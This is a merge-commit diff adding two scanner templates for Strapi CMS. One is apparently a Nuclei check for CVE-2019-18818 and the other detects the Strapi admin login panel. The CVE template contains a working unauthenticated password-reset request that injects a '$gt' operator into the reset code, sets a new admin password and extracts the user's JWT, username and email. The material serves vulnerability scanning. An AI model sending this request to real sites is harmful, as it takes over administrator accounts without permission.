Merge pull request #2573 from idealphase/master

Added CVE-2019-18818

cves/2019/CVE-2019-18818.yaml

@@ -0,0 +1,46 @@
+id: CVE-2019-18818
+
+info:
+  name: Strapi CMS - Admin password reset (Unauthenticated)
+  author: idealphase
+  description: strapi before 3.0.0-beta.17.5 mishandles password resets within packages/strapi-admin/controllers/Auth.js and packages/strapi-plugin-users-permissions/controllers/Auth.js.
+  reference:
+    - https://github.com/advisories/GHSA-6xc2-mj39-q599
+    - https://www.exploit-db.com/exploits/50239
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-18818
+  severity: critical
+  tags: cve,cve2019,strapi,auth-bypass,intrusive
+
+requests:
+  - raw:
+      - |
+        POST /admin/auth/reset-password HTTP/1.1
+        Host: {{Hostname}}
+        Origin: {{BaseURL}}
+        Content-Type: application/json
+
+        {"code": {"$gt": 0}, "password": "SuperStrongPassword1", "passwordConfirmation": "SuperStrongPassword1"}
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "application/json"
+        part: header
+
+      - type: word
+        words:
+          - '"username":'
+          - '"email":'
+          - '"jwt":'
+        part: body
+
+    extractors:
+      - type: json
+        json:
+          - .user.username
+          - .user.email

strapi-panel.yaml

@@ -0,0 +1,23 @@
+id: strapi-panel
+
+info:
+  name: Strapi Login Panel
+  author: idealphase
+  severity: info
+  tags: panel,strapi
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/admin/auth/login'
+
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        words:
+          - "<title>Strapi Admin</title>"
+
+      - type: status
+        status:
+          - 200